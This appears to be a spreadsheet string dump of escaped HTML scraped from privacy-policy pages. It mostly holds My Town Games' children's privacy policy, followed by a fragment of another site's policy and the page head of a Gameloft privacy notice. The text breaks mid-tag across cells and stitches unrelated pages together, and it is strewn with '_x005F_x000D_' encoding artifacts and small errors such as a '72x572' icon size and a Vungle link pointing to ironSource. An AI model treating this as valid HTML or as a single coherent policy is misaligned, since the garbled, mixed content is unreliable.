&lt;script type='text/javascript' src='https://my-town.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://my-town.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://my-town.com/wp-json/" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/json" href="https://my-town.com/wp-json/wp/v2/pages/370" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://my-town.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://my-town.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel='shortlink' href='https://my-town.com/?p=370' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://my-town.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmy-town.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://my-town.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmy-town.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 ! important;margin:0 ! important;}&lt;/style&gt;&lt;link rel="icon" href="https://my-town.com/wp-content/uploads/2018/07/cropped-mt-favicon-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://my-town.com/wp-content/uploads/2018/07/cropped-mt-favicon-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://my-town.com/wp-content/uploads/2018/07/cropped-mt-favicon-180x180.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://my-town.com/wp-content/uploads/2018/07/cropped-mt-favicon-270x270.png" /&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Google Analytics --&gt;
    &lt;script&gt;
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-49840226-11', 'auto');
        ga('send', 'pageview');
    &lt;/script&gt;
    &lt;!-- End Google Analytics --&gt;
&lt;/head&gt;
  &lt;body class="privacy-policy page-template-default page page-id-370"&gt;
    &lt;!--[if IE]&gt;
      &lt;div class="alert alert-warning"&gt;
        You are using an &lt;strong&gt;outdated&lt;/strong&gt; browser.</t>
  </si>
  <si>
    <t>Please &lt;a href="http://browsehappy.com/"&gt;upgrade your browser&lt;/a&gt; to improve your experience.       &lt;/div&gt;
    &lt;! [endif]--&gt;
    &lt;header class="banner top-header"&gt;
  &lt;div class="container"&gt;
		&lt;nav class="navbar navbar-expand-lg nav-primary pb-0 px-0"&gt;
            &lt;div class="collapse navbar-collapse ml-auto order-md-2 order-1 text-center" id="navbarSupportedContent"&gt;
				&lt;div class="menu-main-menu-container"&gt;&lt;ul id="menu-main-menu" class="nav navbar-nav "&gt;&lt;li id="menu-item-15" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15 nav-item"&gt;
	&lt;a class="nav-link"  href="https://my-town.com/games/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-17" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17 nav-item"&gt;
	&lt;a class="nav-link"  href="https://my-town.com/about/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-14" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14 nav-item"&gt;
	&lt;a class="nav-link"  href="https://my-town.com/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-2442" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2442 nav-item"&gt;
	&lt;a class="nav-link"  href="https://my-town.com/mt-plus/"&gt;MT+&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-349" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-349 nav-item dropdown"&gt;
	&lt;a class="nav-link dropdown-toggle"  href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;More&lt;/a&gt;
&lt;div class="dropdown-menu" role="menu"&gt;
&lt;a class="dropdown-item"  href="https://my-town.com/privacy-policy/"&gt;Privacy Policy&lt;/a&gt;&lt;a class="dropdown-item"  href="https://my-town.com/category/news/"&gt;News&lt;/a&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
            &lt;/div&gt;
			&lt;a class="navbar-brand order-md-1 order-2 py-0" href="https://my-town.com/"&gt; &lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/Logo.png" alt="My Town Games"&gt; &lt;/a&gt;
			&lt;button class="navbar-toggler collapsed order-md-3 order-3" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"&gt;
				&lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;
			&lt;/button&gt;
		&lt;/nav&gt;
  &lt;/div&gt;
&lt;/header&gt;
    &lt;div class="wrap container  " role="document"&gt;
      &lt;div class="content row"&gt;
        &lt;main class="main  "&gt;
&lt;/div&gt;
&lt;div class="page-header text-center</t>
  </si>
  <si>
    <t>wow fadeInUp"&gt;
  &lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;/div&gt;
  &lt;div class="content-area wow fadeInUp "&gt;
	&lt;p&gt;Last Updated Date:</t>
  </si>
  <si>
    <t>July 18, 2022&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.my-town.com/datenschutzrichtlinie/"&gt;Datenschutzrichtlinie&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: 18pt;"&gt;&lt;strong&gt;Who Are We?&lt;/strong&gt;&lt;/span&gt; We are My Town Games Ltd, an Israeli Company who produces the My Town Games. We are located at HaPelech St 7, Tel-Aviv Israel.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This privacy policy is meant to comply with your rights under law, and to ensure that you receive adequate information about how your information is collected, processed, conveyed and deleted.&lt;/p&gt;
&lt;p&gt; We acknowledge that our games are meant for young children; and as we are aware that they cannot understand legal documents, we request that you provide your consent as the legal guardian of your child.&lt;/p&gt;
&lt;h3&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt; My Town : City Life Story game app on IOS &amp;amp; Android is certified COPPA compliant.&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The app does not actively collect any information from children.&lt;br /&gt;
It does collect technical information which does not specifically identify a user but supports the operation of the app.&lt;/p&gt;
&lt;p&gt;device_type,mobile_brand_name,mobile_model_name,platform_version,device_id,country,session,page views&lt;/p&gt;
&lt;p&gt;&lt;span style="text-decoration: underline;"&gt;We work with the following third parties in this app:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; We use Firebase Analytics for database and statistics. We collect this information for internal use only and it can’t be used to identify a user.</t>
  </si>
  <si>
    <t>&lt;strong&gt; This third party is prohibited from sharing any data.&lt;/strong&gt; For more https://firebase.google.com/support/privacy/&lt;br /&gt;
 We use the following ad providers to serve contextual ads in the My Town apps.</t>
  </si>
  <si>
    <t>These networks are part of the Google Play certified ad network program. These networks are restricted from tracking users and serving behavioural ads.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;KIDOZ: &lt;a href="https://kidoz.net/safe_ads_policy/"&gt;https://kidoz.net/safe_ads_policy/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Superawesome Ads: &lt;a href="https://www.superawesome.com/awesomeads-for-content-owners-and-platforms/"&gt;https://www.superawesome.com/awesomeads-for-content-owners-and-platforms/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Unity Ads: &lt;a href="https://unity3d.com/legal/privacy-policy"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Iron Source: &lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/"&gt;https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Vungle: &lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/"&gt;https://vungle.com/privacy/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Applovin: &lt;a href="https://www.applovin.com/privacy/"&gt;https://www.applovin.com/privacy/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Google Admob: &lt;a href="https://policies.google.com/privacy?hl=en-US"&gt;https://policies.google.com/privacy?hl=en-US&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;AdColony: https://www.adcolony.com/privacy-policy/&lt;/li&gt;
&lt;li&gt;Chartboost: https://answers.chartboost.com/en-us/articles/200780269&lt;/li&gt;
&lt;li&gt;InMobi: &lt;a href="https://www.inmobi.com/privacy-policy"&gt;https://www.inmobi.com/privacy-policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h5&gt;</t>
  </si>
  <si>
    <t>We have enabled settings on each of these third party ad providers to ensure that no behavioural tracking takes place, data collected is used solely to serve contextual ads and this data is not shared with any other third parties. &lt;strong&gt;All ads are subject to human review for appropriateness.&lt;/strong&gt;&lt;/h5&gt;
&lt;p&gt;For more information on the use of these third parties please view the privacy policies through the links provided.&lt;/p&gt;
&lt;p&gt;If you would like further information about the third party service providers listed please contact us at: &lt;a href="mailto:privacy@my-town.com"&gt;privacy@my-town.com&lt;/a&gt;&lt;br /&gt;
 We may make changes to the policy from time to time so please be sure to check regularly.</t>
  </si>
  <si>
    <t>If we make a material change to this policy we will post notice prior to making the change. If we have your contact details we will contact you before we make the change.&lt;/p&gt;
&lt;p&gt;&lt;span style="font-size: inherit;"&gt;If you would like more information please contact us at: &lt;/span&gt;&lt;a style="font-size: inherit;" href="mailto:privacy@my-town.com"&gt;privacy@my-town.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="text-decoration: underline;"&gt;Kids Privacy Assured by PRIVO:</t>
  </si>
  <si>
    <t>COPPA Safe Harbor Certification&lt;br /&gt;
&lt;a href="https://cert.privo.com/#/companies/appFac19"&gt;&lt;img decoding="async" class="alignnone wp-image-792 size-full" src="https://my-town.com/wp-content/uploads/2019/05/COPPA.png" alt="" width="140" height="70" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;Apps Factory Media Ltd is a member of the PRIVO Kids Privacy Assured COPPA Safe Harbor Certification Program (“the Program”). The Program certification applies to the digital properties listed on the validation page that is viewable by clicking on the PRIVO Seal. PRIVO is an independent, third-party organization committed to safeguarding children&amp;#8217;s personal information collected online.</t>
  </si>
  <si>
    <t>The PRIVO COPPA certification Seal posted on this page indicates Apps Factory Media Ltd has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process. If you have questions or concerns about our privacy practices, please contact us at privacy@my-town.com. If you have further concerns after you have contacted us, you can contact PRIVO directly at &lt;a href="mailto:privacy@privo.com"&gt;privacy@privo.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span style="text-decoration: underline;"&gt;&lt;strong&gt; Security&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;We use generally accepted security measures and safeguards in an attempt to keep the data it collects secure and requires that the third parties it works with agree to do the same.</t>
  </si>
  <si>
    <t>Please be aware though that, despite our best efforts, no security measures are perfect or impenetrable.&lt;/p&gt;
&lt;p&gt;&lt;span style="font-size: 24px;"&gt;&lt;strong&gt;&lt;u&gt;Privacy and the rest of our apps:&lt;/u&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="font-size: 18pt;"&gt;How Do We Collect and process your inforamtion?&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We understand the importance of our users’ personal information, and more importantly the information pertaining to children under 13 years of age. &lt;span style="text-decoration: underline;"&gt;We do not collect&lt;/span&gt; or require users to enter their personal information when using our Products.</t>
  </si>
  <si>
    <t>We do not collect any personal information from children with our apps.&lt;/p&gt;
&lt;p&gt; We may receive your non-personal data indirectly from the following third party analytics or advertisers providers. &lt;strong&gt;These third parties do not share your user data&lt;/strong&gt;; they are used to support the operation of our apps and.</t>
  </si>
  <si>
    <t>(respective privacy policies are noted below):&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;&lt;a href="https://firebase.google.com/policies/analytics"&gt;Google analytics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://unity3d.com/legal/privacy-policy"&gt;Unity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="https://www.back4app.com/privacy.pdf"&gt;Back4app&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://support.google.com/admob/answer/6128543?hl=en"&gt;Google Admob&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://kidoz.net/privacy-policy/"&gt;Kidoz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.superawesome.com/privacy-hub/awesomeads-privacy-policy/"&gt;Superawesome&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/"&gt;Ironsrc&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Do We Use Cookies?&lt;/strong&gt; We use cookies in order to allow your child to log-in to our game when he uses the web interface. A cookie is a small file stored on your computer which may be later also used to identify him.</t>
  </si>
  <si>
    <t>We may also allow several third parties to place cookies. In that case, these cookies may be used to identify your child in their services as well. These third parties include : Google Analytics.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Are Children So Special?</t>
  </si>
  <si>
    <t>&lt;/strong &gt;Your children are special and important. The law provides them with greater protections than adults, which includes their right not to have their personal data used for marketing purposes, and that they may delete this data at any time.</t>
  </si>
  <si>
    <t>It also grants them the right to not be subject to data collection without their specific consent. While under some jurisdictions, the collection of a child&amp;#8217;s personal data is not conditioned on consent, we take the harsher approach and apply this condition to all jurisdictions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Do We Collect Information?&lt;/strong&gt; We collect information when a user play the game or makes purchases All this information is collected and stored on our Firebase database and transferred via secure socket layer (SSL).</t>
  </si>
  <si>
    <t>We use encryption to make sure that third parties cannot listen on the conversation between your mobile device and our servers, and to ensure that information is sent only to our servers, in order to minimize the chance of a malicious entity that might want to impersonate our server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="font-size: 18pt;"&gt;How Can You Review Your Child&amp;#8217;s Information?&lt;/span&gt; &lt;/strong&gt;You can always send us a message at &lt;a href="mailto:privacy@my-town.com"&gt;&lt;span style="text-decoration: underline;"&gt;privacy@my-town.com&lt;/span&gt;&lt;/a&gt; and request that we send you a copy of all your personal data. when doing so, we will first verify your identity, and thereafter we shall provide you with a copy of some information. Please note that if we are unable to verify your identity, we may choose to delete all information in lieu of sending a copy, and that is to increase security.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="font-size: 18pt;"&gt;How Can You Amend, Delete or Request That We Cease Processing Personal Data?&lt;/span&gt; &lt;/strong&gt;</t>
  </si>
  <si>
    <t>Yes. You can send us a message at&lt;br /&gt;
&lt;a href="mailto:privacy@my-town.com"&gt;&lt;span style="text-decoration: underline;"&gt;privacy@my-town.com&lt;/span&gt;&lt;/a&gt; and request that we amend, delete or cease processing of personal data. We will honor these requests and do so, while retaining only the information we need to enforce our legal rights&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="font-size: 18pt;"&gt;Who</t>
  </si>
  <si>
    <t>Can You Contact?&lt;/span&gt; &lt;/strong&gt;If you feel your privacy was violated, send us an email to our privacy officer, at &lt;a href="mailto:privacy@my-town.com"&gt;&lt;span style="text-decoration: underline;"&gt;privacy@my-town.com &lt;/span&gt;&lt;/a&gt; or +9725255559684 and Our officer shall respond and investigate these complaints. He will also publish periodic reports if a specific issue shall arise.&lt;/p&gt;
&lt;/div&gt;
        &lt;/main&gt;&lt;!-- /.main --&gt;
      &lt;/div&gt;&lt;!-- /.content --&gt;
    &lt;/div&gt;&lt;!-- /.wrap --&gt;
&lt;div class="container-fluid parent-award view px-0"&gt;
	&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/footer_top.png" alt="Service" class="img-fluid bg-img"&gt;
	&lt;div class="mask d-flex justify-content-center flex-column align-items-center"&gt;
	&lt;div class="container awards-container"&gt;
&lt;div class="row"&gt;
	&lt;div class="col-md-8 col-xl-9 mx-auto px-md-5"&gt;
		&lt;div class="row content"&gt;
			&lt;div class="col-md-8"&gt;
				&lt;h2 class="title</t>
  </si>
  <si>
    <t>wow fadeInUp"&gt;Awards&lt;/h2&gt;
				&lt;p class="desc wow fadeInUp"&gt;Don't just take our word for it.&lt;br&gt; Take a peak at some of the awards &lt;br&gt; we got over the years.&lt;/p&gt;
			&lt;/div&gt;
			&lt;div class="col-md-4"&gt;
				&lt;div class="pchoice-slider mx-auto wow fadeInUp"&gt;
					&lt;div class="d-flex justify-content-center align-items-center img-con" &gt;
						&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/family-choice.png" alt="family choice awardService" class="img-fluid"&gt;
					&lt;/div&gt;
					&lt;div class="d-flex justify-content-center align-items-center img-con" &gt;
						&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/MomsChoice.png" alt="Moms choice awardService" class="img-fluid"&gt;
					&lt;/div&gt;
					&lt;div class="d-flex justify-content-center align-items-center img-con" &gt;
						&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/national-parenting.png" alt="national parenting award" class="img-fluid"&gt;
					&lt;/div&gt;
					&lt;div class="d-flex justify-content-center align-items-center img-con" &gt;
						&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/funkids.png" alt="Fun stuff award" class="img-fluid"&gt;
					&lt;/div&gt;
					&lt;div class="d-flex justify-content-center align-items-center img-con" &gt;
						&lt;img src="https://my-town.com/wp-content/themes/mytown/dist/images/kidsfirst.png" alt="Kids First award" class="img-fluid"&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;	
	&lt;/div&gt;
&lt;/div&gt;
&lt;div class="d-flex newsletter  justify-content-center position-relative" &gt;
	&lt;div class="position-absolute box wow fadeInUp"&gt;
			&lt;h2 class="title mb-md-0"&gt;Join our Newsletter&lt;/h2&gt;
			&lt;p class="desc mb-md-4"&gt;Be the first one to know about Free games and updates&lt;/p&gt;
        &lt;div role="form" class="wpcf7" id="wpcf7-f117-o1" lang="en-US" dir="ltr"&gt;
&lt;div class="screen-reader-response"&gt;&lt;p role="status" aria-live="polite" aria-atomic="true"&gt;&lt;/p</t>
  </si>
  <si>
    <t>&gt; &lt;ul&gt;&lt;/ul&gt;&lt;/div&gt;
&lt;form action="/privacy-policy/#wpcf7-f117-o1" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init"&gt;
&lt;div style="display: none;"&gt;
&lt;input type="hidden" name="_wpcf7" value="117" /&gt;
&lt;input type=</t>
  </si>
  <si>
    <t>If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible. If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;_x005F_x000D_
	We do not knowingly contact or do business with children under 13 years of age. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a class="numb" href="/cdn-cgi/l/email-protection#a2d1d7d2d2cdd0d6e2cbc6d8c6cbc5cbd6c3ce8cc1cdcf"&gt;&lt;span class="__cf_email__" data-cfemail="8af9fffafae5f8fecae3eef0eee3ede3feebe6a4e9e5e7"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt; so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Changes to Privacy Policy:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html class="no-js" lang="en"&gt;_x005F_x000D_
    &lt;head&gt;_x005F_x000D_
        &lt;meta charset="utf-8"&gt;_x005F_x000D_
        &lt;title&gt;Gameloft&lt;/title&gt;_x005F_x000D_
                 &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
&lt;meta name="viewport" content="width=device-width, viewport-fit=cover, initial-scale=1, maximum-scale=1, viewport-fit=auto"&gt;
&lt;meta name="description" content="Gameloft Showcase"&gt;
&lt;meta name="msapplication-TileColor" content="#00bff3"&gt;
&lt;meta name="msapplication-TileImage" content="https://media01.gameloft.com/web_mkt/favicon/ms-icon-144x144.png"&gt;
&lt;meta name="theme-color" content="#00bff3"&gt;        _x005F_x000D_
_x005F_x000D_
        _ x000D_
        &lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-57x57.png" rel="apple-touch-icon" sizes="57x57"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-60x60.png" rel="apple-touch-icon" sizes="60x60"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-72x72.png" rel="apple-touch-icon" sizes="72x572"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-76x76.png" rel="apple-touch-icon" sizes="76x76"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-114x114.png" rel="apple-touch-icon" sizes="114x114"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-120x120.png" rel="apple-touch-icon" sizes="120x120"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-144x144.png" rel="apple-touch-icon" sizes="144x144"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-152x152.png" rel="apple-touch-icon" sizes="152x152"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/apple-icon-180x180.png" rel="apple-touch-icon" sizes="180x180"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/android-icon-192x192.png" rel="icon" sizes="192x192" type="image/png"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/favicon-32x32.png" rel="icon" sizes="32x32" type="image/png"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/favicon-96x96.png" rel="icon" sizes="96x96" type="image/png"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/favicon-16x16.png" rel="icon" sizes="16x16" type="image/png"&gt;
&lt;link href="https://media01.gameloft.com/web_mkt/favicon/manifest.json" rel="manifest"&gt;
&lt;link href="//www.gameloft.com/assets/css/style.css?v=showcase_v2.2.13" media="all" rel="stylesheet" type="text/css"&gt;
&lt;link href="//www.gameloft.com/assets/css/showcase.css?v=showcase_v2.2.13" media="all" rel="stylesheet" type="text/css"&gt;                _ x000D_
        &lt;script&gt;_x005F_x000D_
//            var basePath = '//';_x005F_x000D_
            var basePath = '//www.gameloft.com/';_x005F_x000D_
            var language = 'en';_x005F_x000D_
            var country = 'us';_x005F_x000D_
            var webviewPlatform = '';_x005F_x000D_
            var mobile_detect = 0;_x005F_x000D_
            var tablet_detect = 0;_x005F_x000D_
        &lt;/script&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
        &lt;style&gt;_x005F_x000D_
            .gl-legal-content {_x005F_x000D_
                padding-left: env(safe-area-inset-left);_x005F_x000D_
                padding-right: env(safe-area-inset-right);_x005F_x000D_
            }_x005F_x000D_
_ x000D_
            @supports(padding: max(0px)) {_x005F_x000D_
                .gl-legal-content {_x005F_x000D_
                    padding-left: max(40px, env(safe-area-inset-left));_x005F_x000D_
                    padding-right: max(40px, env(safe-area-inset-right));_x005F_x000D_
                }_x005F_x000D_
            }_x005F_x000D_
        &lt;/style&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
    &lt;/head&gt;_x005F_x000D_
    &lt;body class=""&gt;_x005F_x000D_
        &lt;section id="main-container"&gt;_x005F_x000D_
            &lt;!-- Didomi consent --&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;window.gdprAppliesGlobally=true;(function(){function a(e){if(!window.frames[e]){if(document.body&amp;&amp;document.body.firstChild){var t=document.body;var n=document.createElement("iframe");n.style.display="none";n.name=e;n.title=e;t.insertBefore(n,t.firstChild)}_x005F_x000D_
else{setTimeout(function(){a(e)},5)}}}function e(n,r,o,c,s){function e(e,t,n,a){if(typeof n!=="function"){return}if(!window[r]){window[r]=[]}var i=false;if(s){i=s(e,t,n)}if(!i){window[r].push({command:e,parameter:t,callback:n,version: a})}}e.stub=true;function t(a){if(!window[n]||window[n].stub!==true){return}if(!a.data){return}_x005F_x000D_
var i=typeof a.data==="string";var e;try{e=i?JSON.parse(a.data):a.data}catch(t){return}if(e[o]){var r=e[o];window[n](r.command,r.parameter,function(e,t){var n={};n[c]={returnValue:e,success:t,callId:r.callId};a.source.postMessage(i?JSON.stringify(n):n,"*")},r.version)}}_x005F_x000D_
if(typeof window[n]!=="function"){window[n]=e;if(window.addEventListener){window.addEventListener("message",t,false)}else{window.attachEvent("onmessage",t)}}}e("__tcfapi","__tcfapiBuffer","__tcfapiCall","__tcfapiReturn");a("__tcfapiLocator");(function(e){_x005F_x000D_
  var t=document.createElement("script");t.id="spcloader";t.type="text/javascript";t.async=true;t.src="https://sdk.privacy-center.org/"+e+"/loader.js?target="+document.location.hostname;t.charset="utf-8";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n)})("4ddf68ae-5211-4fb3-9350-c14ce85ace44")})();&lt;/script&gt;_x005F_x000D_
 _x005F_x000D_
_x005F_x000D_
_x005F_x000D_
    &lt;header class="inner"&gt;_x005F_x000D_
        &lt;div class="header-content pad-edge"&gt;_x005F_x000D_
            &lt;div class="auto"&gt;_x005F_x000D_
                &lt;div class="logo fl"&gt;_x005F_x000D_
                    &lt;a id="header-btn-legal" href="https://www.gameloft.com/en" target="_blank" &gt;_x005F_x000D_
                        &lt;img class="white" src="https://mkt-web.gameloft.com/assets/images/page_template/logo_gameloft_white.png" width="160" height="30" alt="" title="" /&gt;_x005F_x000D_
                        &lt;img class="black" src="https://mkt-web.gameloft.com/assets/images/page_template/logo_gameloft_black.png" width="160" height="30" alt="" title="" /&gt;_x005F_x000D_
                    &lt;/a&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                                &lt;div class="fr privacy-policy"&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
                  &lt;div class="ga-lang"&gt;_x005F_x000D_
    &lt;div class="ga-la-main"&gt;&lt;span class="capt"&gt;English US&lt;/span&gt;&lt;/div&gt;_x005F_x000D_
    &lt;div class="ga-la-select"&gt;_x005F_x000D_
        &lt;ul&gt;_x005F_x000D_
                            &lt;li class="" data-language="ar"&gt;_x005F_x000D_
                    &lt;a href="/ar/privacy-notice/"&gt;&lt;span class="capt"&gt;العربية&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="id"&gt;_x005F_x000D_
                    &lt;a href="/id/privacy-notice/"&gt;&lt;span class="capt"&gt;Bahasa Indonesia&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="bg"&gt;_x005F_x000D_
                    &lt;a href="/bg/privacy-notice/"&gt;&lt;span class="capt"&gt;Bulgarian&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="de"&gt;_x005F_x000D_
                    &lt;a href="/de/privacy-notice/"&gt;&lt;span class="capt"&gt;Deutsch&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="en-gb"&gt;_x005F_x000D_
                    &lt;a href="/en-gb/privacy-notice/"&gt;&lt;span class="capt"&gt;English UK&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="active" data-language="en"&gt;_x005F_x000D_
                     &lt;a href="/en/privacy-notice/"&gt;&lt;span class="capt"&gt;English US&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="es"&gt;_x005F_x000D_
                    &lt;a href="/es/privacy-notice/"&gt;&lt;span class="capt"&gt;Español&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="fr"&gt;_x005F_x000D_
                    &lt;a href="/fr/privacy-notice/"&gt;&lt;span class="capt"&gt;Français&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="it"&gt;_x005F_x000D_
                    &lt;a href="/it/privacy-notice/"&gt;&lt;span class="capt"&gt;Italiano&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="ja"&gt;_x005F_x000D_
